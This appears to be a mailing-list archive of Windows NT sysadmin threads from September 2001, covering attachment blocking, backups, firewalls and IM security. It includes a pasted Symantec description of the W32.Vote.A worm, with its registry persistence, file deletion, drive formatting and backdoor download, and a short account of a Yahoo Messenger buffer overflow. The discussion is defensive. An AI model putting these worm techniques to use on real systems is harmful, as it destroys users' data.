extensions and block filenames. According to the info from NAI, this now blocks
extensions and filenames.

 

Please let
me know if you need any more help.

 

Regards,

 

Steve Clark

Clark
Systems Support, LLC

AVIEN
Charter Member

“Who's
watching your network?”

www.clarksupport.com

 301-610-9584
voice

 240-465-0323
Efax

 





-Original Message-
From: Dianne
[mailto:[EMAIL PROTECTED]]
Sent: Monday, September 24, 2001
9:21 PM
To: NT System Admin Issues
Subject: Re: Exchange 5.5 and
GroupShield

 

Version is 4.5.572.128 Engine 4.0.70





-
Original Message ----- 







From: Clark,
Steve 



 





To: NT System Admin Issues 

Sent: Monday, September 24,
2001 7:41 PM

Subject: RE:
Exchange 5.5 and GroupShield

 

Groupshield 4.5 SP1 will allow
you to block extensions as well as filenames. Are you using 4.5.1?

 

Steve Clark

Clark
Systems Support, LLC

AVIEN
Charter Member

“Who's
watching your network?”

www.clarksupport.com

    301-610-9584
voice

    240-465-0323
Efax

 





-Original Message-
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]]
Sent: Monday, September 24, 2001
6:58 PM
To: NT System Admin Issues
Subject: Exchange 5.5 and
GroupShield

 

Anyone know how to block BOTH specific file extensions and file
names in GroupShield?  Looks like it's an "either or"
configuration so for example, I can't block all .vbs and wtc.exe without
blocking all .exe files.

 

Thanks

http://www.sunbelt-software.com/ntsysadmin_list_charter.htm





http://www.sunbelt-software.com/ntsysadmin_list_charter.htm





http://www.sunbelt-software.com/ntsysadmin_list_charter.htm





http://www.sunbelt-software.com/ntsysadmin_list_charter.htm



Want to
unsub? Do that here:
http://lyris.sunbelt-software.com/scripts/lyris.pl?enter=ntsysadmin&text_mode=0&lang=english




Want to unsub? Do that here:
http://lyris.sunbelt-software.com/scripts/lyris.pl?enter=ntsysadmin&text_mode=0&lang=english

RE: mail loop

[Clark, Steve]

Thanks!

 

Steve Clark

Clark Systems Support, LLC

AVIEN Charter Member

“Who's watching your network?”

www.clarksupport.com

  301-610-9584
voice

  240-465-0323
Efax

 

-Original
Message-
From: Stu Sjouwerman
[mailto:[EMAIL PROTECTED]]
Sent: Monday, September 24, 2001
9:22 PM
To: NT System Admin Issues
Subject: RE: mail loop

 

I already killed that one
this afternoon about 4PM EST.


Stu

 



-Original
Message-
From: Clark, Steve
[mailto:[EMAIL PROTECTED]]
Sent: Monday, September 24, 2001
5:27 PM
To: NT System Admin Issues
Subject: mail loop

Stu -

 

Will you please kill the
Quick Question loop. I've gotten about 20 of them in the last 10 minutes.

 

Thanks.

 

Steve Clark

Clark
Systems Support, LLC

AVIEN
Charter Member

"Who's
watching your network?"

www.clarksupport.com

 301-610-9584
voice

 240-465-0323
Efax

 

http://www.sunbelt-software.com/ntsysadmin_list_charter.htm



http://www.sunbelt-software.com/ntsysadmin_list_charter.htm




http://www.sunbelt-software.com/ntsysadmin_list_charter.htm

RE: NT Backup

[Clark, Steve]

Ohhh, haven't heard that before. Anyone using that now?

Steve Clark
Clark Systems Support, LLC
AVIEN Charter Member
"Who's watching your network?"
www.clarksupport.com
301-610-9584 voice
240-465-0323 Efax

-Original Message-
From: Bill Higgins [mailto:[EMAIL PROTECTED]]
Sent: Monday, September 24, 2001 9:12 PM
To: NT System Admin Issues
Subject: RE: NT Backup

Doesn't installing Exchange Admin on the backup server make NT backup
"Exchange Aware"

Sorry... have always invested in BackupExec...

Have even convinced 5 companies to throw away ArghServSH*T for BackupExec...

-----Original Message-
From: Clark, Steve [mailto:[EMAIL PROTECTED]]
Sent: Monday, September 24, 2001 18:09
To: NT System Admin Issues
Subject: RE: NT Backup


Hey Rocky -

I seem to recall that NT Backup will not backup Exchange stores while they
are running. The last time I looked into this, I came up with the soln of
stopping/ restarting the services for the backup. Unfortunately, as you
aware, Exchange sometimes takes a bit of time and the backup would not get
the info stores.

Buying anything today?

Steve Clark
Clark Systems Support, LLC
AVIEN Charter Member
"Who's watching your network?"
www.clarksupport.com
301-610-9584 voice
240-465-0323 Efax

-Original Message-
From: Rocky Stefano [mailto:[EMAIL PROTECTED]]
Sent: Monday, September 24, 2001 8:01 PM
To: NT System Admin Issues
Subject: NT Backup


Quick.

I've never had to use NT backup on W2K for a client before. Well finally
have one cheap enough that doesn't want to spring for Veritas so my question
is.

When you use the backup wizard and it asks if you want to backup everything
on the machine, does that include the IS for Exchange as well. I know if I
do it manually I can choose the IS manually.

Thanks


http://www.sunbelt-software.com/ntsysadmin_list_charter.htm

http://www.sunbelt-software.com/ntsysadmin_list_charter.htm

http://www.sunbelt-software.com/ntsysadmin_list_charter.htm

http://www.sunbelt-software.com/ntsysadmin_list_charter.htm

RE: Exchange 5.5 and GroupShield

[Clark, Steve]

Ok – inside the Groupshield properties, click on the tab On-Access. At
the bottom of the page is another button and 3 radio buttons. No blocking, All
attachments and specified attachments. When you click on select, there are 3
more radio buttons. None, block extensions and block filenames. I put info in
both block extensions and block filenames. According to the info from NAI, this
now blocks extensions and filenames.

 

Please let me know if you need any more help.

 

Regards,

 

Steve Clark

Clark Systems Support, LLC

AVIEN Charter Member

“Who's watching your network?”

www.clarksupport.com

  301-610-9584
voice

  240-465-0323
Efax

 

-Original
Message-
From: Dianne
[mailto:[EMAIL PROTECTED]]
Sent: Monday, September 24, 2001
9:21 PM
To: NT System Admin Issues
Subject: Re: Exchange 5.5 and
GroupShield

 

Version
is 4.5.572.128 Engine 4.0.70



-
Original Message - 



From: Clark,
Steve 



To: NT System Admin Issues 

Sent: Monday, September 24,
2001 7:41 PM

Subject: RE:
Exchange 5.5 and GroupShield

 

Groupshield 4.5 SP1 will
allow you to block extensions as well as filenames. Are you using 4.5.1?

 

Steve Clark

Clark
Systems Support, LLC

AVIEN
Charter Member

“Who's
watching your network?”

www.clarksupport.com

 301-610-9584
voice

 240-465-0323
Efax

 





-Original Message-
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]]
Sent: Monday, September 24, 2001 6:58
PM
To: NT System Admin Issues
Subject: Exchange 5.5 and
GroupShield

 

Anyone know how to block BOTH specific file extensions and file
names in GroupShield?  Looks like it's an "either or"
configuration so for example, I can't block all .vbs and wtc.exe without
blocking all .exe files.

 

Thanks

http://www.sunbelt-software.com/ntsysadmin_list_charter.htm





http://www.sunbelt-software.com/ntsysadmin_list_charter.htm



http://www.sunbelt-software.com/ntsysadmin_list_charter.htm




http://www.sunbelt-software.com/ntsysadmin_list_charter.htm

RE: Get Me Off the List, Please

[Clark, Steve]

I agree that posting to this list is a cry for abuse. But on the other side,
there are a lot of people that simply can't handle scanning email and
deleting stuff that's off topic or not related to their function that
minute. It's unfortunate that they don't understand the fact that even
though the topic may be NT Backup, something that is being addressed may
assist in their function.

I can't tell you how much this list has added value - even the pissing
contests of late with people. It's all in fun and trying to accomplish a
common goal.

Ok - let the jeering being!

-Original Message-
From: David N. Precht [mailto:[EMAIL PROTECTED]]
Sent: Monday, September 24, 2001 8:42 PM
To: NT System Admin Issues
Subject: RE: Get Me Off the List, Please

The scariest part are the people how are this "stupid", are somewhere
either admins or wannabe admins...
e

-Original Message-
From: Jesse E. Gardner [mailto:[EMAIL PROTECTED]]
Sent: Monday, September 24, 2001 19:46
To: NT System Admin Issues
Subject: RE: Get Me Off the List, Please


For the life of me, I can't figure out why anyone would want to get off
of this list.  ???  :)

Jesse E. Gardner, MCP
P.O. Box 11431
Columbia, SC 29211
(803)216-0119
(803)216-0921 fax
(803)361-4361 cell
[EMAIL PROTECTED]

 -Original Message-
From:   Don Ely [mailto:[EMAIL PROTECTED]]
Sent:   Monday, September 24, 2001 3:32 PM
To: NT System Admin Issues
Subject:RE: Get Me Off the List, Please

Get yourself off the list.  The link is at the bottom of the email.

-Original Message-
From: Maas [mailto:[EMAIL PROTECTED]]
Sent: Monday, September 24, 2001 12:18 PM
To: NT System Admin Issues
Cc: [EMAIL PROTECTED]
Subject: Get Me Off the List, Please


[EMAIL PROTECTED]

please remove the address above from the list server

thank you...in over my head here

http://www.sunbelt-software.com/ntsysadmin_list_charter.htm



http://www.sunbelt-software.com/ntsysadmin_list_charter.htm




http://www.sunbelt-software.com/ntsysadmin_list_charter.htm



_

Do You Yahoo!?

Get your free @yahoo.com address at http://mail.yahoo.com




http://www.sunbelt-software.com/ntsysadmin_list_charter.htm

http://www.sunbelt-software.com/ntsysadmin_list_charter.htm

RE: NT Backup

[Clark, Steve]

Hey Rocky -

I seem to recall that NT Backup will not backup Exchange stores while they
are running. The last time I looked into this, I came up with the soln of
stopping/ restarting the services for the backup. Unfortunately, as you
aware, Exchange sometimes takes a bit of time and the backup would not get
the info stores.

Buying anything today?

Steve Clark
Clark Systems Support, LLC
AVIEN Charter Member
"Who's watching your network?"
www.clarksupport.com
301-610-9584 voice
240-465-0323 Efax

-Original Message-
From: Rocky Stefano [mailto:[EMAIL PROTECTED]]
Sent: Monday, September 24, 2001 8:01 PM
To: NT System Admin Issues
Subject: NT Backup


Quick.

I've never had to use NT backup on W2K for a client before. Well finally
have one cheap enough that doesn't want to spring for Veritas so my question
is.

When you use the backup wizard and it asks if you want to backup everything
on the machine, does that include the IS for Exchange as well. I know if I
do it manually I can choose the IS manually.

Thanks


http://www.sunbelt-software.com/ntsysadmin_list_charter.htm

http://www.sunbelt-software.com/ntsysadmin_list_charter.htm

RE: Print from scheduled batch file

[Clark, Steve]

Ok – this is
starting to sound familiar now. I got tired of working with the buggy task
scheduler and invested $50 into AT 2000 from Cypress Technology. I’ve used it
on NT and 2K without problems. This was how I got around authentication
problems from multiple processes that Scheduler would not handle.

 

Sorry for
the delay – drain bamage.

 

Steve Clark

Clark Systems Support, LLC

AVIEN Charter Member

“Who's watching your network?”

www.clarksupport.com

  301-610-9584
voice

  240-465-0323
Efax

 

-Original
Message-
From: Dianne
[mailto:[EMAIL PROTECTED]]
Sent: Monday, September 24, 2001
8:42 PM
To: NT System Admin Issues
Subject: Re: Print from scheduled
batch file

 

The
Task Scheduler won't allow you to change the login info for the service. 
It's greyed out.  I thought there was a service called
"schedule" but all I can find is "task scheduler". 
It's been a while since I've worked with it. 



-
Original Message - 



From: [EMAIL PROTECTED]




To: NT System Admin Issues 

Sent: Monday, September 24,
2001 7:08 PM

Subject: RE:
Print from scheduled batch file

 

make sure Scheduler service logs on with an account that has rights
to printer





-Original
Message-
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]]
Sent: Monday, September 24, 2001
2:37 PM
To: NT System Admin Issues
Subject: Print from scheduled
batch file

I'm
trying to automate reports from the new hfnetchk hotfix check tool.  The
goal is to have the reports on the printer once a week so I can check for
any fixes that need to be applied.  I have a batch file that works
interactively, but when I run it through the scheduler, it will not
print.  Machine is nt4sp6a.  Sounds permissions related, but I
can't find where to change it.  Any ideas or other suggestions? 
Thanks in advance.

 

The
command is  hfnetchk -h server > \\server\printshare

OR

hfnetchk
-h server > server.txt

copy
server.txt \\server\printer

 

 

http://www.sunbelt-software.com/ntsysadmin_list_charter.htm





http://www.sunbelt-software.com/ntsysadmin_list_charter.htm



http://www.sunbelt-software.com/ntsysadmin_list_charter.htm




http://www.sunbelt-software.com/ntsysadmin_list_charter.htm

RE: Another F(*&^ virus!

[Clark, Steve]

Title: Message









Haven’t
seen anything at all from NAI – have you?

 

Steve Clark

Clark Systems Support, LLC

AVIEN Charter Member

“Who's watching your network?”

www.clarksupport.com

  301-610-9584
voice

  240-465-0323
Efax

 

-Original
Message-
From: Martin Blackstone
[mailto:[EMAIL PROTECTED]]
Sent: Monday, September 24, 2001
5:41 PM
To: NT System Admin Issues
Subject: RE: Another F(*&^
virus!

 

Trend has a def file for
it.

945

It isn't available via
automatic DL yet, but you can DL the ZIP file and manually put it in.

-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED]] 
Sent: Monday, September 24, 2001
1:37 PM
To: NT System Admin Issues
Subject: Another F(*&^ virus!

 

Subject of email: Fwd:Peace BeTweeN
AmeriCa and IsLaM! 
Name of attachment: WTC.exe 
Size of attachment: 55808 Bytes 

Symantec Security Response 
http://securityresponse.symantec.com

  
W32.Vote.A@mm 
Discovered on: September 24, 2001 
Last Updated on: September 24, 2001 at 09:56:27 AM PDT 

W32.Vote.A@mm is a mass-mailing worm that
is written in Visual Basic. When executed, it will email itself out to all
email addresses in the Microsoft Outlook address book. The worm will insert two
.vbs files on the system, and it will also attempt to delete files from several
antivirus products. 

Type: Worm 

Infection Length: 55,808 Bytes 

Virus Definitions: September 24, 2001 

Threat Assessment: 

   
Wild: 
Low  Damage: 
High  Distribution: 
High  
  

Wild: 

Number of infections: 0 - 49 
Number of sites: 3 - 9 
Geographical distribution: Medium 
Threat containment: Moderate 
Removal: Moderate 
Damage: 

Payload: 
Large scale e-mailing: Emails everyone in the Microsoft Outlook
addressbook 
Deletes files: After reboot, the worm attempts to delete all files
in the Windows folder 
Modifies files: All files with the extension "htm" or
"html" will be overwritten. 
Compromises security settings: If the Backdoor.Trojan was
successfully downloaded and installed, anyone could gain full access to the
computer. 

Distribution: 

Subject of email: Fwd:Peace BeTweeN
AmeriCa and IsLaM! 
Name of attachment: WTC.exe 
Size of attachment: 55808 Bytes 

Technical description: 

W32.Vote.A@mm is a mass-mailing worm
written in the Visual Basic language. It requires the file Msvbvm50.dll to
execute.

When executed, the worm will attempt to
email itself to all contacts in the Microsoft Outlook address book. The email
will appear as follows.

Subject: Fwd:Peace BeTweeN AmeriCa and
IsLaM! 

Message: 
Hi 
iS iT A waR Against AmeriCa Or IsLaM !? 
Let's Vote To Live in Peace! 

Attachment: WTC.EXE 

Next, the worm will insert two .vbs files
on the system: 

 

\\ZaCker.vbs 
\\MixDaLaL.vbs 

In addition, the worm will attempt to
download and execute a file. This file is detected as Backdoor.Trojan by Norton
Antivirus.

Finally, the worm will attempt to delete
all files from several folders. These folders appear to be the default
installation folders for several antivirus products. For Norton AntiVirus, this
worm will only attempt to delete the files if Norton Antivirus is located in
C:\Program Files\Norton AntiVirus.

What the dropped files do 

MixDaLaL.vbs 
MixDaLaL.vbs is a Visual Basic Script file that is inserted in the
\Windows\System folder. This file is executed by the worm. As the file is
executed, it will look through all folders on all fixed drives and network
drives for files with the extensions .htm or .html. If such a files are found,
they are overwritten with the message:

AmeRiCa ...Few Days WiLL Show You What We
Can Do !!! It's Our Turn >>> ZaCkEr is So Sorry For You 

ZaCker.VBS 
This file is inserted in the \Windows\System folder. It is not
executed by the worm. Instead, the value 

Norton.Thar \Windows\System\ZaCker.vbs 

is added to the registry key 

HKEY_LOCAL_MACHINE\Microsoft\ 
Windows\CurrentVersion\Run 

so that the file is executed when you
start Windows. 

When executed at the next restart, this
file will attempt to delete all files in the \Windows folder. Next, the worm
will create or overwrite the file C:\Autoexec.bat. Inside the file there will
be a command that formats the C drive. The Autoexec.bat file is executed on
Windows 95/98/Me and DOS systems when you start the computer.

Finally, the worm will displays the
message 

 

The worm does attempt to shut down Windows
after the message has been displayed. However, because the files required for
this event to occur have been deleted from the \Windows folder, the computer
probably will not shut down.

 

Removal instructions: 

 

1. Run LiveUpdate to make sure that you
have the most recent virus definitions. 
2. Start Norton AntiVirus (NAV), and make sure that NAV is
configured to scan all files. For instructions on how to do this, read the
document How to configure Norton AntiVirus to scan all files.

3. Run a full system scan. 
4. Delete all files that are detected as W32.Vote.A@mm. If the
worm has run and Norton Ant

RE: Exchange 5.5 and GroupShield

[Clark, Steve]

Groupshield
4.5 SP1 will allow you to block extensions as well as filenames. Are you using
4.5.1?

 

Steve Clark

Clark Systems Support, LLC

AVIEN Charter Member

“Who's watching your network?”

www.clarksupport.com

  301-610-9584
voice

  240-465-0323
Efax

 

-Original
Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED]]
Sent: Monday, September 24, 2001
6:58 PM
To: NT System Admin Issues
Subject: Exchange 5.5 and
GroupShield

 

Anyone
know how to block BOTH specific file extensions and file names in
GroupShield?  Looks like it's an "either or" configuration so
for example, I can't block all .vbs and wtc.exe without blocking all .exe
files.

 

Thanks

http://www.sunbelt-software.com/ntsysadmin_list_charter.htm




http://www.sunbelt-software.com/ntsysadmin_list_charter.htm

RE: mail loop

[Clark, Steve]

Title: Message









Thanks martin.
I’ve got some coal for your stocking.

 

Steve Clark

Clark Systems Support, LLC

AVIEN Charter Member

“Who's watching your network?”

www.clarksupport.com

  301-610-9584
voice

  240-465-0323
Efax

 

-Original
Message-
From: Martin Blackstone
[mailto:[EMAIL PROTECTED]]
Sent: Monday, September 24, 2001
5:40 PM
To: NT System Admin Issues
Subject: RE: mail loop

 

Nice try but no cigar! :)

-Original Message-
From: Clark, Steve
[mailto:[EMAIL PROTECTED]] 
Sent: Monday, September 24, 2001
2:27 PM
To: NT System Admin Issues
Subject: mail loop

Stu –

 

Will you please kill the Quick Question loop. I’ve
gotten about 20 of them in the last 10 minutes.

 

Thanks.

 

Steve Clark

Clark Systems Support, LLC

AVIEN Charter Member

“Who's watching your network?”

www.clarksupport.com

  301-610-9584
voice

  240-465-0323
Efax

 

http://www.sunbelt-software.com/ntsysadmin_list_charter.htm

http://www.sunbelt-software.com/ntsysadmin_list_charter.htm




http://www.sunbelt-software.com/ntsysadmin_list_charter.htm

RE: New virus on the loose

[Clark, Steve]

Title: New virus on the loose









Trend
doesn’t say anything about formatting the drive. Just overwriting files. NAI,
F-secure have nothing on it yet. SARC indicates it as destructive attempting to
delete the Windows folder.

 

Steve Clark

Clark Systems Support, LLC

AVIEN Charter Member

“Who's watching your network?”

www.clarksupport.com

  301-610-9584
voice

  240-465-0323
Efax

 

-Original
Message-
From: Murray Freeman
[mailto:[EMAIL PROTECTED]]
Sent: Monday, September 24, 2001
4:57 PM
To: NT System Admin Issues
Subject: RE: New virus on the
loose

 

Rick, where did you hear
this? While I realize that it's possible for a virus to "erase" your
hard drive, I get nervous everytime I hear that a virus is on the loose that
will wipe your drive clean, etc,etc.

 

Murray

-Original
Message-
From: Ziminski, Rick (Rick)** CTR
** [mailto:[EMAIL PROTECTED]]
Sent: Monday, September 24, 2001
3:32 PM
To: NT System Admin Issues
Subject: New virus on the loose

 

A new
virus called W32/Vote@MM has been reported to be circulating around the Internet. 
If you receive an email with the Subject: "Fwd:Peace BeTweeN AmeriCa And
IsLam!", delete the email and do not open the "wtc.exe"
attachment.  Executing the "wtc.exe" attachment will format your
C-drive and destroy your data.

Rick 
rzski@hotmail 

http://www.sunbelt-software.com/ntsysadmin_list_charter.htm

http://www.sunbelt-software.com/ntsysadmin_list_charter.htm




http://www.sunbelt-software.com/ntsysadmin_list_charter.htm

RE: Get Me Off the List, Please

[Clark, Steve]

So get a clue and look at the footer
http://lyris.sunbelt-software.com/scripts/lyris.pl

Steve Clark
Clark Systems Support, LLC
AVIEN Charter Member
"Who's watching your network?"
www.clarksupport.com
301-610-9584 voice
240-465-0323 Efax

-Original Message-
From: Lance Klindt [mailto:[EMAIL PROTECTED]]
Sent: Monday, September 24, 2001 4:06 PM
To: NT System Admin Issues
Subject: RE: Get Me Off the List, Please

Me THree? I want to be PULLED

Please... for the love of GOd

3 or 4 post an hour would be fine not.. 3 or 4 a f*cking Min.

-Original Message-
From: Martin Blackstone [mailto:[EMAIL PROTECTED]]
Sent: Monday, September 24, 2001 2:23 PM
To: NT System Admin Issues
Subject: RE: Get Me Off the List, Please


http://lyris.sunbelt-software.com/scripts/lyris.pl

-Original Message-
From: Maas [mailto:[EMAIL PROTECTED]]
Sent: Monday, September 24, 2001 12:18 PM
To: NT System Admin Issues
Cc: [EMAIL PROTECTED]
Subject: Get Me Off the List, Please


[EMAIL PROTECTED]

please remove the address above from the list server

thank you...in over my head here

http://www.sunbelt-software.com/ntsysadmin_list_charter.htm


http://www.sunbelt-software.com/ntsysadmin_list_charter.htm

http://www.sunbelt-software.com/ntsysadmin_list_charter.htm

http://www.sunbelt-software.com/ntsysadmin_list_charter.htm

mail loop

[Clark, Steve]

Stu –

 

Will you please kill the Quick Question loop. I’ve gotten about 20 of
them in the last 10 minutes.

 

Thanks.

 

Steve Clark

Clark Systems Support, LLC

AVIEN Charter Member

“Who's watching your network?”

www.clarksupport.com

  301-610-9584
voice

  240-465-0323
Efax

 




http://www.sunbelt-software.com/ntsysadmin_list_charter.htm

RE: SirCam Virus Problem Exchange Server

[Clark, Steve]

You can clock all email from @home.com in the IMC.

Steve Clark
Clark Systems Support, LLC
AVIEN Charter Member
"Who's watching your network?"
www.clarksupport.com
301-610-9584 voice
240-465-0323 Efax

-Original Message-
From: Murray Freeman [mailto:[EMAIL PROTECTED]]
Sent: Monday, September 24, 2001 11:22 AM
To: NT System Admin Issues
Subject: SirCam Virus Problem Exchange Server

Our webmaster seems to have found a "friend" who apparently doesn't know she
has the SirCam virus. We're being sent hundreds of emails from this one
account to our webmaster. We've set up a rule to forward all these emails to
our webmasters delete folder, but apparently that's creating problems as
well. Our webmaster doesn't want us to shut down that alias, so does anyone
have any other ideas to somehow eliminate the problem. All the email is
coming from an address at HOME.COM.

Murray

http://www.sunbelt-software.com/ntsysadmin_list_charter.htm

http://www.sunbelt-software.com/ntsysadmin_list_charter.htm

RE: Ideas for firewall

[Clark, Steve]

Don’t forget to get the software subscription service. 

 

Steve Clark

Clark Systems Support, LLC

AVIEN Charter Member

“Who's watching your network?”

www.clarksupport.com

  301-610-9584
voice

  240-465-0323
Efax

 

-Original
Message-
From: Patrick Straub
[mailto:[EMAIL PROTECTED]]
Sent: Monday, September 24, 2001
10:18 AM
To: NT System Admin Issues
Subject: RE: Ideas for firewall

 

I agree with you. The
start versions NS5 is also really cheap (about 550$; don't really know to price
in US$ as I leave in Switzerland).

 

Patrick Straub /
Systems Engineer / OfficeCom
---
ECON!S AG / eBusiness Solutions
- Electronic Business Solutions
- Network and Office Solutions
- Consulting and Projectmanagement
Neumattstrasse 7 / CH 8953 Dietikon /
Switzerland
Phone ++41 (0) 1 744 73 73
Direct ++41 (0) 1 744 73 39
Fax ++ 41 (0) 1 744 73 99
<<mailto:[EMAIL PROTECTED]>>
<<http://www.econis.com/>>
--- 

-Original
Message-
From: Keith Johnson
[mailto:[EMAIL PROTECTED]]
Sent: Montag, 24. September 2001
15:55
To: NT System Admin Issues
Subject: RE: Ideas for firewall

NetScreen...Great
solution!

 

Here's a reseller link:

www.firstnetsecurity.com

 

good bunch to work with

 

 

Keith Johnson
Information Systems Manager
Pulaski County DSS
[EMAIL PROTECTED]
Voice - 540.980.7920
Fax - 540.980.7993 

 

-Original
Message-
From: Clark, Steve
[mailto:[EMAIL PROTECTED]]
Sent: Monday, September 24, 2001
9:33 AM
To: NT System Admin Issues
Subject: RE: Ideas for firewall

Netscreen's are by far the easiest and best solution
I've seen.

 

Steve Clark

Clark Systems Support, LLC

AVIEN Charter Member

"Who's watching your network?"

www.clarksupport.com

  301-610-9584
voice

  240-465-0323
Efax

 

-Original
Message-
From: Martijn Eindhoven
[mailto:[EMAIL PROTECTED]]
Sent: Monday, September 24, 2001
4:55 AM
To: NT System Admin Issues
Subject: Ideas for firewall

 

Hey Guys,

I'm looking for a good firewall for about 50 w2k servers. What do you guys
think is the best setup, per server or one dedicated firewall.
And what is according to you guys the best firewall, i'm thinkin of a stateful
one. 







Met
vriendelijke groet,


M. Eindhoven
W2K System Administrator
Bevelander Internet Services B.V. 
Folkstoneweg 10 
1118 LM SCHIPHOL Zuidoost 
Tel : 020 40 53 900 
Fax : 020 40 53 910 
http://www.bevelander.nl
=

This communication contains information which is confidential and 
may also be privileged. It is for the exclusive use of the 
intended recipient(s). If you are not the intended recipient(s), 
please note that any distribution, copying or use of this 
communication or the information in it is strictly prohibited. 
If you have received this communication in error, please notify 
the sender immediately and then destroy any copies of it. 
=
http://www.sunbelt-software.com/ntsysadmin_list_charter.htm

http://www.sunbelt-software.com/ntsysadmin_list_charter.htm

http://www.sunbelt-software.com/ntsysadmin_list_charter.htm

http://www.sunbelt-software.com/ntsysadmin_list_charter.htm




http://www.sunbelt-software.com/ntsysadmin_list_charter.htm

RE: Looking for a discussion on IM

[Clark, Steve]

Cool link – thanks!

 

Steve Clark

Clark Systems Support, LLC

AVIEN Charter Member

“Who's watching your network?”

www.clarksupport.com

  301-610-9584
voice

  240-465-0323
Efax

 

-Original
Message-
From: Murray, Christopher L.
[mailto:[EMAIL PROTECTED]]
Sent: Monday, September 24, 2001
10:03 AM
To: NT System Admin Issues
Subject: RE: Looking for a
discussion on IM

 

A good page for finding
info on this is www.infosyssec.com It
has a like there to the ICAT metabase of vulnerabilities

-Original
Message-
From: Clark, Steve
[mailto:[EMAIL PROTECTED]]
Sent: Monday, September 24, 2001
9:55 AM
To: NT System Admin Issues
Subject: RE: Looking for a
discussion on IM

Kevin – thanks for your integrity and the info.

 

Steve Clark

Clark Systems Support, LLC

AVIEN Charter Member

“Who's watching your network?”

www.clarksupport.com

  301-610-9584
voice

  240-465-0323
Efax

 

-Original
Message-
From: Kevin Lundy
[mailto:[EMAIL PROTECTED]]
Sent: Monday, September 24, 2001
9:35 AM
To: NT System Admin Issues
Subject: RE: Looking for a
discussion on IM

 

You
know, I violated a cardinal rule of mine - don't post something if you can't
back it up.  I did have a reference and now can't find it.  I did
find a similar exploit in the Yahoo messenger.  I'm still pretty confident
I did read about either a real attack via the icon, or at least a proof of
concept, and I will keep looking for it.  Anyway, the below is an exploit
against an IM, so it shows it is vulnerable.  

 

From http://www.ca.com/virusinfo/encyclopedia/

 

Yahoo Pager/Messanger Buffer Overflow
There is a buffer
overflow problem with Yahoo Messenger that leaves the user vulnerable to remote
attack. The problem arises due to a lack of appropriate bounds checking on the
length of a URL that is received from another user inside a message.
Unfortunately, due to this oversight, it is possible for unprivileged and
possibly hostile remote users to execute arbitrary commands by overwriting the
EIP (return address) and filling the URL with malevolent code. The hostile code
could then be actioned when the unsuspecting target host clicks on the URL. 

-Original
Message-
From: Gordon W. Smith
[mailto:[EMAIL PROTECTED]]
Sent: Monday, September 24, 2001
9:07 AM
To: NT System Admin Issues
Subject: RE: Looking for a
discussion on IM

OUCH! 
A virus in a smiley?  Tell me more!  I couldn't find anything about
it.

-Original
Message-
From: Kevin Lundy
[mailto:[EMAIL PROTECTED]]
Sent: Monday, September 24, 2001
7:50 AM
To: NT System Admin Issues
Subject: RE: Looking for a
discussion on IM

Two
things come to immediate mind:

 

1) Many
IM clients allow for file transfer.  Depending on your overall security
policy this in itself can be an issue.  Even if you allow people to
transfer files, the IM client then becomes a point of security control. 
For example, with AIM, it is supposed to ask the user if it is ok if their chat
partner sends them a file.  How long do you think it will be before
hackers manage to bypass that "confirmation"?  Further, then
they bad-guys could then just send a backdoor program to the hard disk. 
Or just pick up sensitive data from the computer.

 

2) There
has already been at least one IM based virus - done by embedding malicious code
in an icon smiley face.  This becomes another area where the anti-virus
vendors have to keep up. 

 

I'm sure
there are other reasons as well, those are just the 2 that come to my mind
before finishing my first cup of coffee.

-Original
Message-
From: Clark, Steve
[mailto:[EMAIL PROTECTED]]
Sent: Sunday, September 23, 2001
11:17 PM
To: NT System Admin Issues
Subject: Looking for a discussion
on IM

Hello,

 

I have been asked to research and potentially
implement IM for a company to communicate internally as well as externally.
However, I have always heard that IM was evil and to close it down ASAP. I
would like to hear real world implementation concerns/ tips as well as the
security issues associated.

 

Thanks in advance for your input.

 

Steve Clark

Clark Systems Support, LLC

AVIEN Charter Member

"Who's watching your network?"

www.clarksupport.com

  301-610-9584
voice

  240-465-0323
Efax

 

http://www.sunbelt-software.com/ntsysadmin_list_charter.htm

http://www.sunbelt-software.com/ntsysadmin_list_charter.htm

http://www.sunbelt-software.com/ntsysadmin_list_charter.htm

http://www.sunbelt-software.com/ntsysadmin_list_charter.htm

http://www.sunbelt-software.com/ntsysadmin_list_charter.htm

http://www.sunbelt-software.com/ntsysadmin_list_charter.htm




http://www.sunbelt-software.com/ntsysadmin_list_charter.htm

RE: Push Instalation

[Clark, Steve]

Excellent point. Isn't there someway of doing a staged install using a
scheduler? Run the same install from the dummy logon which would resolve the
"security" issue but have the first 10 kick off at 9:00, the 2nd at 9:15.
...?

Never looked into this but it sounds interesting.

Steve Clark
Clark Systems Support, LLC
AVIEN Charter Member
"Who's watching your network?"
www.clarksupport.com
301-610-9584 voice
240-465-0323 Efax

-Original Message-
From: Martin Blackstone [mailto:[EMAIL PROTECTED]]
Sent: Monday, September 24, 2001 9:58 AM
To: NT System Admin Issues
Subject: RE: Push Instalation

Once you have the IE install setup and on a network share, you could do
this the quick and dirty way.
Create a dummy user account, give that account a logon script that calls
the installer.
Go to each WS, logon with that account and let it run.

A couple of switches you will want with the IEAK is to use a non
interactive mode install. That way once the installer launches, there
are no questions asked. It just goes. The other is tell it to reboot
after install.

Granted this wouldn't work very well on a large network, but with a 100
machines, you could knock this out in an hour.

-----Original Message-
From: Clark, Steve [mailto:[EMAIL PROTECTED]]
Sent: Monday, September 24, 2001 6:52 AM
To: NT System Admin Issues
Subject: RE: Push Instalation


Build the install using IEAK. If the PC's are NT4 or W2K Pro, use can St
Bernard or something similar

Steve Clark
Clark Systems Support, LLC
AVIEN Charter Member
"Who's watching your network?"
www.clarksupport.com
301-610-9584 voice
240-465-0323 Efax

-Original Message-
From: Ahmed Aboudeeb [mailto:[EMAIL PROTECTED]]
Sent: Monday, September 24, 2001 9:47 AM
To: NT System Admin Issues
Subject: Push Instalation

hi to all
i need to install IE 5.5 to 100 users in our company, how can i do it as
a Push Instalation from the server. i have an NT 4.0 domain, just NT 4.0
servers. thanks

http://www.sunbelt-software.com/ntsysadmin_list_charter.htm

http://www.sunbelt-software.com/ntsysadmin_list_charter.htm


http://www.sunbelt-software.com/ntsysadmin_list_charter.htm

http://www.sunbelt-software.com/ntsysadmin_list_charter.htm

RE: Looking for a discussion on IM

[Clark, Steve]

Kevin –
thanks for your integrity and the info.

 

Steve Clark

Clark Systems Support, LLC

AVIEN Charter Member

“Who's watching your network?”

www.clarksupport.com

